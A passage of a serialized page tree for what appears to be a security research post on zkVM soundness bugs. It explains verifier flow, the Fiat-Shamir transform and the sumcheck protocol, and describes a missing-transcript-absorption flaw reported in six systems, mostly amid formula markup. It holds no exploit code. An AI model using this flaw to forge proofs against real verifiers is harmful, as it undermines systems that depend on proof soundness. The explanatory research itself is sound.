flow:",{"type":27,"tag":12719,"props":115642,"children":115643},{},[115644,115649,115654,115659,115664,115669],{"type":27,"tag":1232,"props":115645,"children":115646},{},[115647],{"type":33,"value":115648},"Fix public statement data.",{"type":27,"tag":1232,"props":115650,"children":115651},{},[115652],{"type":33,"value":115653},"Parse proof payload (commitments, reduction messages, openings).",{"type":27,"tag":1232,"props":115655,"children":115656},{},[115657],{"type":33,"value":115658},"Rebuild Fiat-Shamir challenges from transcript state.",{"type":27,"tag":1232,"props":115660,"children":115661},{},[115662],{"type":33,"value":115663},"Check constraint equations at sampled points.",{"type":27,"tag":1232,"props":115665,"children":115666},{},[115667],{"type":33,"value":115668},"Check PCS/opening consistency.",{"type":27,"tag":1232,"props":115670,"children":115671},{},[115672],{"type":33,"value":115673},"Accept only if all checks are jointly consistent.",{"type":27,"tag":36,"props":115675,"children":115676},{},[115677],{"type":27,"tag":126,"props":115678,"children":115681},{"alt":115679,"src":115680},"1_prover_verifier","/posts/zkvms-unfaithful-claims/1_prover_verifier.svg",[],{"type":27,"tag":36,"props":115683,"children":115684},{},[115685],{"type":33,"value":115686},"The non-negotiable invariant is transcript ordering: if a value affects a verifier equation, it must be absorbed before sampling the challenge that gates that equation. Violating this gives the prover an attacker-controlled degree of freedom.",{"type":27,"tag":26063,"props":115688,"children":115689},{},[],{"type":27,"tag":28,"props":115691,"children":115693},{"id":115692},"the-building-blocks",[115694],{"type":33,"value":115695},"The Building Blocks",{"type":27,"tag":36,"props":115697,"children":115698},{},[115699],{"type":33,"value":115700},"Before we can understand the bugs, we need to understand the protocols they break. Each of these is a tool that zkVMs compose together.",{"type":27,"tag":58,"props":115702,"children":115704},{"id":115703},"the-fiat-shamir-transform",[115705],{"type":33,"value":115706},"The Fiat-Shamir Transform",{"type":27,"tag":36,"props":115708,"children":115709},{},[115710],{"type":33,"value":115711},"Interactive protocols (the type most commonly described in literature) require real-time communication. It involves the verifier sending random challenges, and the prover responding to them. This doesn't work for blockchains (where you have no real-time verifier) or when you want anyone to verify your proof at a later point.",{"type":27,"tag":36,"props":115713,"children":115714},{},[115715],{"type":33,"value":115716},"The solution is to replace the verifier's randomness with a hash function. The prover \"talks to themselves,\" using the hash of everything so far as the challenge. If we use a cryptographic hash function, this should mean that the challenges are completely unpredictable.",{"type":27,"tag":36,"props":115718,"children":115719},{},[115720],{"type":27,"tag":126,"props":115721,"children":115724},{"alt":115722,"src":115723},"fiat_shamir2","/posts/zkvms-unfaithful-claims/fiat_shamir2.svg",[],{"type":27,"tag":36,"props":115726,"children":115727},{},[115728,115730,115734,115736,115741],{"type":33,"value":115729},"The hash (transcript) ",{"type":27,"tag":12606,"props":115731,"children":115732},{},[115733],{"type":33,"value":13801},{"type":33,"value":115735}," include everything that affects verification ",{"type":27,"tag":12606,"props":115737,"children":115738},{},[115739],{"type":33,"value":115740},"BEFORE",{"type":33,"value":115742}," the challenges derived from it are used.",{"type":27,"tag":36,"props":115744,"children":115745},{},[115746,115748,115774,115776,115801,115803,115828,115830,115855,115857,115882],{"type":33,"value":115747},"If some value ",{"type":27,"tag":84,"props":115749,"children":115751},{"className":115750},[11266,11267],[115752],{"type":27,"tag":207,"props":115753,"children":115755},{"className":115754},[11272],[115756],{"type":27,"tag":207,"props":115757,"children":115759},{"className":115758,"ariaHidden":11278},[11277],[115760],{"type":27,"tag":207,"props":115761,"children":115763},{"className":115762},[11283],[115764,115768],{"type":27,"tag":207,"props":115765,"children":115767},{"className":115766,"style":28855},[11288],[],{"type":27,"tag":207,"props":115769,"children":115771},{"className":115770,"style":115449},[11294,28860],[115772],{"type":33,"value":115773},"V",{"type":33,"value":115775}," affects a verification equation, but ",{"type":27,"tag":84,"props":115777,"children":115779},{"className":115778},[11266,11267],[115780],{"type":27,"tag":207,"props":115781,"children":115783},{"className":115782},[11272],[115784],{"type":27,"tag":207,"props":115785,"children":115787},{"className":115786,"ariaHidden":11278},[11277],[115788],{"type":27,"tag":207,"props":115789,"children":115791},{"className":115790},[11283],[115792,115796],{"type":27,"tag":207,"props":115793,"children":115795},{"className":115794,"style":28855},[11288],[],{"type":27,"tag":207,"props":115797,"children":115799},{"className":115798,"style":115449},[11294,28860],[115800],{"type":33,"value":115773},{"type":33,"value":115802}," isn't absorbed before the relevant challenge is squeezed, then the challenge is completely independent of ",{"type":27,"tag":84,"props":115804,"children":115806},{"className":115805},[11266,11267],[115807],{"type":27,"tag":207,"props":115808,"children":115810},{"className":115809},[11272],[115811],{"type":27,"tag":207,"props":115812,"children":115814},{"className":115813,"ariaHidden":11278},[11277],[115815],{"type":27,"tag":207,"props":115816,"children":115818},{"className":115817},[11283],[115819,115823],{"type":27,"tag":207,"props":115820,"children":115822},{"className":115821,"style":28855},[11288],[],{"type":27,"tag":207,"props":115824,"children":115826},{"className":115825,"style":115449},[11294,28860],[115827],{"type":33,"value":115773},{"type":33,"value":115829},". This means that the prover can \"see\" (compute in advance) the challenge before choosing ",{"type":27,"tag":84,"props":115831,"children":115833},{"className":115832},[11266,11267],[115834],{"type":27,"tag":207,"props":115835,"children":115837},{"className":115836},[11272],[115838],{"type":27,"tag":207,"props":115839,"children":115841},{"className":115840,"ariaHidden":11278},[11277],[115842],{"type":27,"tag":207,"props":115843,"children":115845},{"className":115844},[11283],[115846,115850],{"type":27,"tag":207,"props":115847,"children":115849},{"className":115848,"style":28855},[11288],[],{"type":27,"tag":207,"props":115851,"children":115853},{"className":115852,"style":115449},[11294,28860],[115854],{"type":33,"value":115773},{"type":33,"value":115856},", which may allow it to choose ",{"type":27,"tag":84,"props":115858,"children":115860},{"className":115859},[11266,11267],[115861],{"type":27,"tag":207,"props":115862,"children":115864},{"className":115863},[11272],[115865],{"type":27,"tag":207,"props":115866,"children":115868},{"className":115867,"ariaHidden":11278},[11277],[115869],{"type":27,"tag":207,"props":115870,"children":115872},{"className":115871},[11283],[115873,115877],{"type":27,"tag":207,"props":115874,"children":115876},{"className":115875,"style":28855},[11288],[],{"type":27,"tag":207,"props":115878,"children":115880},{"className":115879,"style":115449},[11294,28860],[115881],{"type":33,"value":115773},{"type":33,"value":115883}," exactly so that the verification passes, even though it should not.",{"type":27,"tag":36,"props":115885,"children":115886},{},[115887],{"type":33,"value":115888},"This is the bug class we found in all six systems.",{"type":27,"tag":58,"props":115890,"children":115892},{"id":115891},"the-sumcheck-protocol",[115893],{"type":33,"value":115894},"The Sumcheck Protocol",{"type":27,"tag":36,"props":115896,"children":115897},{},[115898,115900,115986],{"type":33,"value":115899},"The sumcheck protocol proves that a polynomial sums to a claimed value over the Boolean hypercube (all inputs in ",{"type":27,"tag":84,"props":115901,"children":115903},{"className":115902},[11266,11267],[115904],{"type":27,"tag":207,"props":115905,"children":115907},{"className":115906},[11272],[115908],{"type":27,"tag":207,"props":115909,"children":115911},{"className":115910,"ariaHidden":11278},[11277],[115912],{"type":27,"tag":207,"props":115913,"children":115915},{"className":115914},[11283],[115916,115920,115925,115930,115935,115939,115944],{"type":27,"tag":207,"props":115917,"children":115919},{"className":115918,"style":11393},[11288],[],{"type":27,"tag":207,"props":115921,"children":115923},{"className":115922},[28989],[115924],{"type":33,"value":1322},{"type":27,"tag":207,"props":115926,"children":115928},{"className":115927},[11294],[115929],{"type":33,"value":1660},{"type":27,"tag":207,"props":115931,"children":115933},{"className":115932},[11404],[115934],{"type":33,"value":11407},{"type":27,"tag":207,"props":115936,"children":115938},{"className":115937,"style":11411},[11372],[],{"type":27,"tag":207,"props":115940,"children":115942},{"className":115941},[11294],[115943],{"type":33,"value":1651},{"type":27,"tag":207,"props":115945,"children":115947},{"className":115946},[29011],[115948,115953],{"type":27,"tag":207,"props":115949,"children":115951},{"className":115950},[29011],[115952],{"type":33,"value":41396},{"type":27,"tag":207,"props":115954,"children":115956},{"className":115955},[11309],[115957],{"type":27,"tag":207,"props":115958,"children":115960},{"className":115959},[11314],[115961],{"type":27,"tag":207,"props":115962,"children":115964},{"className":115963},[11319],[115965],{"type":27,"tag":207,"props":115966,"children":115969},{"className":115967,"style":115968},[11324],"height:0.6644em;",[115970],{"type":27,"tag":207,"props":115971,"children":115972},{"style":11328},[115973,115977],{"type":27,"tag":207,"props":115974,"children":115976},{"className":115975,"style":11334},[11333],[],{"type":27,"tag":207,"props":115978,"children":115980},{"className":115979},[11339,11340,11341,11342],[115981],{"type":27,"tag":207,"props":115982,"children":115984},{"className":115983},[11294,28860,11342],[115985],{"type":33,"value":63637},{"type":33,"value":115987},"), i.e the claim:",{"type":27,"tag":36,"props":115989,"children":115990},{},[115991],{"type":27,"tag":84,"props":115992,"children":115994},{"className":115993},[11266,11267],[115995],{"type":27,"tag":207,"props":115996,"children":115998},{"className":115997},[11272],[115999],{"type":27,"tag":207,"props":116000,"children":116002},{"className":116001,"ariaHidden":11278},[11277],[116003,116029],{"type":27,"tag":207,"props":116004,"children":116006},{"className":116005},[11283],[116007,116011,116016,116020,116025],{"type":27,"tag":207,"props":116008,"children":116010},{"className":116009,"style":28855},[11288],[],{"type":27,"tag":207,"props":116012,"children":116014},{"className":116013,"style":100498},[11294,28860],[116015],{"type":33,"value":100501},{"type":27,"tag":207,"props":116017,"children":116019},{"className":116018,"style":11470},[11372],[],{"type":27,"tag":207,"props":116021,"children":116023},{"className":116022},[11475],[116024],{"type":33,"value":10380},{"type":27,"tag":207,"props":116026,"children":116028},{"className":116027,"style":11470},[11372],[],{"type":27,"tag":207,"props":116030,"children":116032},{"className":116031},[11283],[116033,116037,116187,116191,116334,116338,116345,116349,116493,116497,116503,116508,116565,116570,116574,116631,116636,116640,116646,116650,116655,116659,116717],{"type":27,"tag":207,"props":116034,"children":116036},{"className":116035,"style":28891},[11288],[],{"type":27,"tag":207,"props":116038,"children":116040},{"className":116039},[28896],[116041,116047],{"type":27,"tag":207,"props":116042,"children":116044},{"className":116043,"style":28903},[28896,28901,28902],[116045],{"type":33,"value":116046},"∑",{"type":27,"tag":207,"props":116048,"children":116050},{"className":116049},[11309],[116051],{"type":27,"tag":207,"props":116052,"children":116054},{"className":116053},[11314,28914],[116055,116176],{"type":27,"tag":207,"props":116056,"children":116058},{"className":116057},[11319],[116059,116171],{"type":27,"tag":207,"props":116060,"children":116062},{"className":116061,"style":28923},[11324],[116063],{"type":27,"tag":207,"props":116064,"children":116065},{"style":28927},[116066,116070],{"type":27,"tag":207,"props":116067,"children":116069},{"className":116068,"style":11334},[11333],[],{"type":27,"tag":207,"props":116071,"children":116073},{"className":116072},[11339,11340,11341,11342],[116074],{"type":27,"tag":207,"props":116075,"children":116077},{"className":116076},[11294,11342],[116078,116141,116146,116151,116156,116161,116166],{"type":27,"tag":207,"props":116079,"children":116081},{"className":116080},[11294,11342],[116082,116087],{"type":27,"tag":207,"props":116083,"children":116085},{"className":116084},[11294,28860,11342],[116086],{"type":33,"value":26546},{"type":27,"tag":207,"props":116088,"children":116090},{"className":116089},[11309],[116091],{"type":27,"tag":207,"props":116092,"children":116094},{"className":116093},[11314,28914],[116095,116129],{"type":27,"tag":207,"props":116096,"children":116098},{"className":116097},[11319],[116099,116124],{"type":27,"tag":207,"props":116100,"children":116103},{"className":116101,"style":116102},[11324],"height:0.3173em;",[116104],{"type":27,"tag":207,"props":116105,"children":116107},{"style":116106},"top:-2.357em;margin-left:0em;margin-right:0.0714em;",[116108,116113],{"type":27,"tag":207,"props":116109,"children":116112},{"className":116110,"style":116111},[11333],"height:2.5em;",[],{"type":27,"tag":207,"props":116114,"children":116118},{"className":116115},[11339,116116,116117,11342],"reset-size3","size1",[116119],{"type":27,"tag":207,"props":116120,"children":116122},{"className":116121},[11294,11342],[116123],{"type":33,"value":1651},{"type":27,"tag":207,"props":116125,"children":116127},{"className":116126},[29017],[116128],{"type":33,"value":29020},{"type":27,"tag":207,"props":116130,"children":116132},{"className":116131},[11319],[116133],{"type":27,"tag":207,"props":116134,"children":116137},{"className":116135,"style":116136},[11324],"height:0.143em;",[116138],{"type":27,"tag":207,"props":116139,"children":116140},{},[],{"type":27,"tag":207,"props":116142,"children":116144},{"className":116143},[11475,11342],[116145],{"type":33,"value":28967},{"type":27,"tag":207,"props":116147,"children":116149},{"className":116148},[28989,11342],[116150],{"type":33,"value":1322},{"type":27,"tag":207,"props":116152,"children":116154},{"className":116153},[11294,11342],[116155],{"type":33,"value":1660},{"type":27,"tag":207,"props":116157,"children":116159},{"className":116158},[11404,11342],[116160],{"type":33,"value":11407},{"type":27,"tag":207,"props":116162,"children":116164},{"className":116163},[11294,11342],[116165],{"type":33,"value":1651},{"type":27,"tag":207,"props":116167,"children":116169},{"className":116168},[29011,11342],[116170],{"type":33,"value":41396},{"type":27,"tag":207,"props":116172,"children":116174},{"className":116173},[29017],[116175],{"type":33,"value":29020},{"type":27,"tag":207,"props":116177,"children":116179},{"className":116178},[11319],[116180],{"type":27,"tag":207,"props":116181,"children":116183},{"className":116182,"style":29028},[11324],[116184],{"type":27,"tag":207,"props":116185,"children":116186},{},[],{"type":27,"tag":207,"props":116188,"children":116190},{"className":116189,"style":11411},[11372],[],{"type":27,"tag":207,"props":116192,"children":116194},{"className":116193},[28896],[116195,116200],{"type":27,"tag":207,"props":116196,"children":116198},{"className":116197,"style":28903},[28896,28901,28902],[116199],{"type":33,"value":116046},{"type":27,"tag":207,"props":116201,"children":116203},{"className":116202},[11309],[116204],{"type":27,"tag":207,"props":116205,"children":116207},{"className":116206},[11314,28914],[116208,116323],{"type":27,"tag":207,"props":116209,"children":116211},{"className":116210},[11319],[116212,116318],{"type":27,"tag":207,"props":116213,"children":116215},{"className":116214,"style":28923},[11324],[116216],{"type":27,"tag":207,"props":116217,"children":116218},{"style":28927},[116219,116223],{"type":27,"tag":207,"props":116220,"children":116222},{"className":116221,"style":11334},[11333],[],{"type":27,"tag":207,"props":116224,"children":116226},{"className":116225},[11339,11340,11341,11342],[116227],{"type":27,"tag":207,"props":116228,"children":116230},{"className":116229},[11294,11342],[116231,116288,116293,116298,116303,116308,116313],{"type":27,"tag":207,"props":116232,"children":116234},{"className":116233},[11294,11342],[116235,116240],{"type":27,"tag":207,"props":116236,"children":116238},{"className":116237},[11294,28860,11342],[116239],{"type":33,"value":26546},{"type":27,"tag":207,"props":116241,"children":116243},{"className":116242},[11309],[116244],{"type":27,"tag":207,"props":116245,"children":116247},{"className":116246},[11314,28914],[116248,116277],{"type":27,"tag":207,"props":116249,"children":116251},{"className":116250},[11319],[116252,116272],{"type":27,"tag":207,"props":116253,"children":116255},{"className":116254,"style":116102},[11324],[116256],{"type":27,"tag":207,"props":116257,"children":116258},{"style":116106},[116259,116263],{"type":27,"tag":207,"props":116260,"children":116262},{"className":116261,"style":116111},[11333],[],{"type":27,"tag":207,"props":116264,"children":116266},{"className":116265},[11339,116116,116117,11342],[116267],{"type":27,"tag":207,"props":116268,"children":116270},{"className":116269},[11294,11342],[116271],{"type":33,"value":1744},{"type":27,"tag":207,"props":116273,"children":116275},{"className":116274},[29017],[116276],{"type":33,"value":29020},{"type":27,"tag":207,"props":116278,"children":116280},{"className":116279},[11319],[116281],{"type":27,"tag":207,"props":116282,"children":116284},{"className":116283,"style":116136},[11324],[116285],{"type":27,"tag":207,"props":116286,"children":116287},{},[],{"type":27,"tag":207,"props":116289,"children":116291},{"className":116290},[11475,11342],[116292],{"type":33,"value":28967},{"type":27,"tag":207,"props":116294,"children":116296},{"className":116295},[28989,11342],[116297],{"type":33,"value":1322},{"type":27,"tag":207,"props":116299,"children":116301},{"className":116300},[11294,11342],[116302],{"type":33,"value":1660},{"type":27,"tag":207,"props":116304,"children":116306},{"className":116305},[11404,11342],[116307],{"type":33,"value":11407},{"type":27,"tag":207,"props":116309,"children":116311},{"className":116310},[11294,11342],[116312],{"type":33,"value":1651},{"type":27,"tag":207,"props":116314,"children":116316},{"className":116315},[29011,11342],[116317],{"type":33,"value":41396},{"type":27,"tag":207,"props":116319,"children":116321},{"className":116320},[29017],[116322],{"type":33,"value":29020},{"type":27,"tag":207,"props":116324,"children":116326},{"className":116325},[11319],[116327],{"type":27,"tag":207,"props":116328,"children":116330},{"className":116329,"style":29028},[11324],[116331],{"type":27,"tag":207,"props":116332,"children":116333},{},[],{"type":27,"tag":207,"props":116335,"children":116337},{"className":116336,"style":11411},[11372],[],{"type":27,"tag":207,"props":116339,"children":116342},{"className":116340},[116341],"minner",[116343],{"type":33,"value":116344},"⋯",{"type":27,"tag":207,"props":116346,"children":116348},{"className":116347,"style":11411},[11372],[],{"type":27,"tag":207,"props":116350,"children":116352},{"className":116351},[28896],[116353,116358],{"type":27,"tag":207,"props":116354,"children":116356},{"className":116355,"style":28903},[28896,28901,28902],[116357],{"type":33,"value":116046},{"type":27,"tag":207,"props":116359,"children":116361},{"className":116360},[11309],[116362],{"type":27,"tag":207,"props":116363,"children":116365},{"className":116364},[11314,28914],[116366,116482],{"type":27,"tag":207,"props":116367,"children":116369},{"className":116368},[11319],[116370,116477],{"type":27,"tag":207,"props":116371,"children":116373},{"className":116372,"style":28923},[11324],[116374],{"type":27,"tag":207,"props":116375,"children":116376},{"style":28927},[116377,116381],{"type":27,"tag":207,"props":116378,"children":116380},{"className":116379,"style":11334},[11333],[],{"type":27,"tag":207,"props":116382,"children":116384},{"className":116383},[11339,11340,11341,11342],[116385],{"type":27,"tag":207,"props":116386,"children":116388},{"className":116387},[11294,11342],[116389,116447,116452,116457,116462,116467,116472],{"type":27,"tag":207,"props":116390,"children":116392},{"className":116391},[11294,11342],[116393,116398],{"type":27,"tag":207,"props":116394,"children":116396},{"className":116395},[11294,28860,11342],[116397],{"type":33,"value":26546},{"type":27,"tag":207,"props":116399,"children":116401},{"className":116400},[11309],[116402],{"type":27,"tag":207,"props":116403,"children":116405},{"className":116404},[11314,28914],[116406,116436],{"type":27,"tag":207,"props":116407,"children":116409},{"className":116408},[11319],[116410,116431],{"type":27,"tag":207,"props":116411,"children":116414},{"className":116412,"style":116413},[11324],"height:0.1645em;",[116415],{"type":27,"tag":207,"props":116416,"children":116417},{"style":116106},[116418,116422],{"type":27,"tag":207,"props":116419,"children":116421},{"className":116420,"style":116111},[11333],[],{"type":27,"tag":207,"props":116423,"children":116425},{"className":116424},[11339,116116,116117,11342],[116426],{"type":27,"tag":207,"props":116427,"children":116429},{"className":116428},[11294,28860,11342],[116430],{"type":33,"value":63637},{"type":27,"tag":207,"props":116432,"children":116434},{"className":116433},[29017],[116435],{"type":33,"value":29020},{"type":27,"tag":207,"props":116437,"children":116439},{"className":116438},[11319],[116440],{"type":27,"tag":207,"props":116441,"children":116443},{"className":116442,"style":116136},[11324],[116444],{"type":27,"tag":207,"props":116445,"children":116446},{},[],{"type":27,"tag":207,"props":116448,"children":116450},{"className":116449},[11475,11342],[116451],{"type":33,"value":28967},{"type":27,"tag":207,"props":116453,"children":116455},{"className":116454},[28989,11342],[116456],{"type":33,"value":1322},{"type":27,"tag":207,"props":116458,"children":116460},{"className":116459},[11294,11342],[116461],{"type":33,"value":1660},{"type":27,"tag":207,"props":116463,"children":116465},{"className":116464},[11404,11342],[116466],{"type":33,"value":11407},{"type":27,"tag":207,"props":116468,"children":116470},{"className":116469},[11294,11342],[116471],{"type":33,"value":1651},{"type":27,"tag":207,"props":116473,"children":116475},{"className":116474},[29011,11342],[116476],{"type":33,"value":41396},{"type":27,"tag":207,"props":116478,"children":116480},{"className":116479},[29017],[116481],{"type":33,"value":29020},{"type":27,"tag":207,"props":116483,"children":116485},{"className":116484},[11319],[116486],{"type":27,"tag":207,"props":116487,"children":116489},{"className":116488,"style":29028},[11324],[116490],{"type":27,"tag":207,"props":116491,"children":116492},{},[],{"type":27,"tag":207,"props":116494,"children":116496},{"className":116495,"style":11411},[11372],[],{"type":27,"tag":207,"props":116498,"children":116500},{"className":116499,"style":100750},[11294,28860],[116501],{"type":33,"value":116502},"g",{"type":27,"tag":207,"props":116504,"children":116506},{"className":116505},[28989],[116507],{"type":33,"value":1343},{"type":27,"tag":207,"props":116509,"children":116511},{"className":116510},[11294],[116512,116517],{"type":27,"tag":207,"props":116513,"children":116515},{"className":116514},[11294,28860],[116516],{"type":33,"value":26546},{"type":27,"tag":207,"props":116518,"children":116520},{"className":116519},[11309],[116521],{"type":27,"tag":207,"props":116522,"children":116524},{"className":116523},[11314,28914],[116525,116554],{"type":27,"tag":207,"props":116526,"children":116528},{"className":116527},[11319],[116529,116549],{"type":27,"tag":207,"props":116530,"children":116532},{"className":116531,"style":100316},[11324],[116533],{"type":27,"tag":207,"props":116534,"children":116535},{"style":100320},[116536,116540],{"type":27,"tag":207,"props":116537,"children":116539},{"className":116538,"style":11334},[11333],[],{"type":27,"tag":207,"props":116541,"children":116543},{"className":116542},[11339,11340,11341,11342],[116544],{"type":27,"tag":207,"props":116545,"children":116547},{"className":116546},[11294,11342],[116548],{"type":33,"value":1651},{"type":27,"tag":207,"props":116550,"children":116552},{"className":116551},[29017],[116553],{"type":33,"value":29020},{"type":27,"tag":207,"props":116555,"children":116557},{"className":116556},[11319],[116558],{"type":27,"tag":207,"props":116559,"children":116561},{"className":116560,"style":100347},[11324],[116562],{"type":27,"tag":207,"props":116563,"children":116564},{},[],{"type":27,"tag":207,"props":116566,"children":116568},{"className":116567},[11404],[116569],{"type":33,"value":11407},{"type":27,"tag":207,"props":116571,"children":116573},{"className":116572,"style":11411},[11372],[],{"type":27,"tag":207,"props":116575,"children":116577},{"className":116576},[11294],[116578,116583],{"type":27,"tag":207,"props":116579,"children":116581},{"className":116580},[11294,28860],[116582],{"type":33,"value":26546},{"type":27,"tag":207,"props":116584,"children":116586},{"className":116585},[11309],[116587],{"type":27,"tag":207,"props":116588,"children":116590},{"className":116589},[11314,28914],[116591,116620],{"type":27,"tag":207,"props":116592,"children":116594},{"className":116593},[11319],[116595,116615],{"type":27,"tag":207,"props":116596,"children":116598},{"className":116597,"style":100316},[11324],[116599],{"type":27,"tag":207,"props":116600,"children":116601},{"style":100320},[116602,116606],{"type":27,"tag":207,"props":116603,"children":116605},{"className":116604,"style":11334},[11333],[],{"type":27,"tag":207,"props":116607,"children":116609},{"className":116608},[11339,11340,11341,11342],[116610],{"type":27,"tag":207,"props":116611,"children":116613},{"className":116612},[11294,11342],[116614],{"type":33,"value":1744},{"type":27,"tag":207,"props":116616,"children":116618},{"className":116617},[29017],[116619],{"type":33,"value":29020},{"type":27,"tag":207,"props":116621,"children":116623},{"className":116622},[11319],[116624],{"type":27,"tag":207,"props":116625,"children":116627},{"className":116626,"style":100347},[11324],[116628],{"type":27,"tag":207,"props":116629,"children":116630},{},[],{"type":27,"tag":207,"props":116632,"children":116634},{"className":116633},[11404],[116635],{"type":33,"value":11407},{"type":27,"tag":207,"props":116637,"children":116639},{"className":116638,"style":11411},[11372],[],{"type":27,"tag":207,"props":116641,"children":116643},{"className":116642},[116341],[116644],{"type":33,"value":116645},"…",{"type":27,"tag":207,"props":116647,"children":116649},{"className":116648,"style":11411},[11372],[],{"type":27,"tag":207,"props":116651,"children":116653},{"className":116652},[11404],[116654],{"type":33,"value":11407},{"type":27,"tag":207,"props":116656,"children":116658},{"className":116657,"style":11411},[11372],[],{"type":27,"tag":207,"props":116660,"children":116662},{"className":116661},[11294],[116663,116668],{"type":27,"tag":207,"props":116664,"children":116666},{"className":116665},[11294,28860],[116667],{"type":33,"value":26546},{"type":27,"tag":207,"props":116669,"children":116671},{"className":116670},[11309],[116672],{"type":27,"tag":207,"props":116673,"children":116675},{"className":116674},[11314,28914],[116676,116706],{"type":27,"tag":207,"props":116677,"children":116679},{"className":116678},[11319],[116680,116701],{"type":27,"tag":207,"props":116681,"children":116684},{"className":116682,"style":116683},[11324],"height:0.1514em;",[116685],{"type":27,"tag":207,"props":116686,"children":116687},{"style":100320},[116688,116692],{"type":27,"tag":207,"props":116689,"children":116691},{"className":116690,"style":11334},[11333],[],{"type":27,"tag":207,"props":116693,"children":116695},{"className":116694},[11339,11340,11341,11342],[116696],{"type":27,"tag":207,"props":116697,"children":116699},{"className":116698},[11294,28860,11342],[116700],{"type":33,"value":63637},{"type":27,"tag":207,"props":116702,"children":116704},{"className":116703},[29017],[116705],{"type":33,"value":29020},{"type":27,"tag":207,"props":116707,"children":116709},{"className":116708},[11319],[116710],{"type":27,"tag":207,"props":116711,"children":116713},{"className":116712,"style":100347},[11324],[116714],{"type":27,"tag":207,"props":116715,"children":116716},{},[],{"type":27,"tag":207,"props":116718,"children":116720},{"className":116719},[29011],[116721],{"type":33,"value":10416},{"type":27,"tag":36,"props":116723,"children":116724},{},[116725,116727,116788],{"type":33,"value":116726},"The naive approach would be for the verifier to compute all ",{"type":27,"tag":84,"props":116728,"children":116730},{"className":116729},[11266,11267],[116731],{"type":27,"tag":207,"props":116732,"children":116734},{"className":116733},[11272],[116735],{"type":27,"tag":207,"props":116736,"children":116738},{"className":116737,"ariaHidden":11278},[11277],[116739],{"type":27,"tag":207,"props":116740,"children":116742},{"className":116741},[11283],[116743,116747],{"type":27,"tag":207,"props":116744,"children":116746},{"className":116745,"style":115968},[11288],[],{"type":27,"tag":207,"props":116748,"children":116750},{"className":116749},[11294],[116751,116756],{"type":27,"tag":207,"props":116752,"children":116754},{"className":116753},[11294],[116755],{"type":33,"value":1744},{"type":27,"tag":207,"props":116757,"children":116759},{"className":116758},[11309],[116760],{"type":27,"tag":207,"props":116761,"children":116763},{"className":116762},[11314],[116764],{"type":27,"tag":207,"props":116765,"children":116767},{"className":116766},[11319],[116768],{"type":27,"tag":207,"props":116769,"children":116771},{"className":116770,"style":115968},[11324],[116772],{"type":27,"tag":207,"props":116773,"children":116774},{"style":11328},[116775,116779],{"type":27,"tag":207,"props":116776,"children":116778},{"className":116777,"style":11334},[11333],[],{"type":27,"tag":207,"props":116780,"children":116782},{"className":116781},[11339,11340,11341,11342],[116783],{"type":27,"tag":207,"props":116784,"children":116786},{"className":116785},[11294,28860,11342],[116787],{"type":33,"value":63637},{"type":33,"value":116789}," evaluations. This is exponentially expensive.",{"type":27,"tag":36,"props":116791,"children":116792},{},[116793,116795,116800],{"type":33,"value":116794},"The sumcheck protocol is a clever interactive protocol that reduces the exponential number of polynomial evaluations to checking ",{"type":27,"tag":12606,"props":116796,"children":116797},{},[116798],{"type":33,"value":116799},"only one",{"type":33,"value":1041},{"type":27,"tag":36,"props":116802,"children":116803},{},[116804],{"type":27,"tag":126,"props":116805,"children":116808},{"alt":116806,"src":116807},"sumcheck_v2","/posts/zkvms-unfaithful-claims/sumcheck_v2.svg",[],{"type":27,"tag":36,"props":116810,"children":116811},{},[116812,116814,116906,116908,117093,117095,117120,117122,117200,117202,117281],{"type":33,"value":116813},"In each round, the prover must send a polynomial ",{"type":27,"tag":84,"props":116815,"children":116817},{"className":116816},[11266,11267],[116818],{"type":27,"tag":207,"props":116819,"children":116821},{"className":116820},[11272],[116822],{"type":27,"tag":207,"props":116823,"children":116825},{"className":116824,"ariaHidden":11278},[11277],[116826],{"type":27,"tag":207,"props":116827,"children":116829},{"className":116828},[11283],[116830,116834,116891,116896,116901],{"type":27,"tag":207,"props":116831,"children":116833},{"className":116832,"style":11393},[11288],[],{"type":27,"tag":207,"props":116835,"children":116837},{"className":116836},[11294],[116838,116843],{"type":27,"tag":207,"props":116839,"children":116841},{"className":116840,"style":100750},[11294,28860],[116842],{"type":33,"value":116502},{"type":27,"tag":207,"props":116844,"children":116846},{"className":116845},[11309],[116847],{"type":27,"tag":207,"props":116848,"children":116850},{"className":116849},[11314,28914],[116851,116880],{"type":27,"tag":207,"props":116852,"children":116854},{"className":116853},[11319],[116855,116875],{"type":27,"tag":207,"props":116856,"children":116858},{"className":116857,"style":100793},[11324],[116859],{"type":27,"tag":207,"props":116860,"children":116861},{"style":100797},[116862,116866],{"type":27,"tag":207,"props":116863,"children":116865},{"className":116864,"style":11334},[11333],[],{"type":27,"tag":207,"props":116867,"children":116869},{"className":116868},[11339,11340,11341,11342],[116870],{"type":27,"tag":207,"props":116871,"children":116873},{"className":116872},[11294,28860,11342],[116874],{"type":33,"value":4690},{"type":27,"tag":207,"props":116876,"children":116878},{"className":116877},[29017],[116879],{"type":33,"value":29020},{"type":27,"tag":207,"props":116881,"children":116883},{"className":116882},[11319],[116884],{"type":27,"tag":207,"props":116885,"children":116887},{"className":116886,"style":100347},[11324],[116888],{"type":27,"tag":207,"props":116889,"children":116890},{},[],{"type":27,"tag":207,"props":116892,"children":116894},{"className":116893},[28989],[116895],{"type":33,"value":1343},{"type":27,"tag":207,"props":116897,"children":116899},{"className":116898,"style":102284},[11294,28860],[116900],{"type":33,"value":13415},{"type":27,"tag":207,"props":116902,"children":116904},{"className":116903},[29011],[116905],{"type":33,"value":10416},{"type":33,"value":116907}," such that ",{"type":27,"tag":84,"props":116909,"children":116911},{"className":116910},[11266,11267],[116912],{"type":27,"tag":207,"props":116913,"children":116915},{"className":116914},[11272],[116916],{"type":27,"tag":207,"props":116917,"children":116919},{"className":116918,"ariaHidden":11278},[11277],[116920,117013],{"type":27,"tag":207,"props":116921,"children":116923},{"className":116922},[11283],[116924,116928,116985,116990,116995,117000,117004,117009],{"type":27,"tag":207,"props":116925,"children":116927},{"className":116926,"style":11393},[11288],[],{"type":27,"tag":207,"props":116929,"children":116931},{"className":116930},[11294],[116932,116937],{"type":27,"tag":207,"props":116933,"children":116935},{"className":116934,"style":100750},[11294,28860],[116936],{"type":33,"value":116502},{"type":27,"tag":207,"props":116938,"children":116940},{"className":116939},[11309],[116941],{"type":27,"tag":207,"props":116942,"children":116944},{"className":116943},[11314,28914],[116945,116974],{"type":27,"tag":207,"props":116946,"children":116948},{"className":116947},[11319],[116949,116969],{"type":27,"tag":207,"props":116950,"children":116952},{"className":116951,"style":100793},[11324],[116953],{"type":27,"tag":207,"props":116954,"children":116955},{"style":100797},[116956,116960],{"type":27,"tag":207,"props":116957,"childre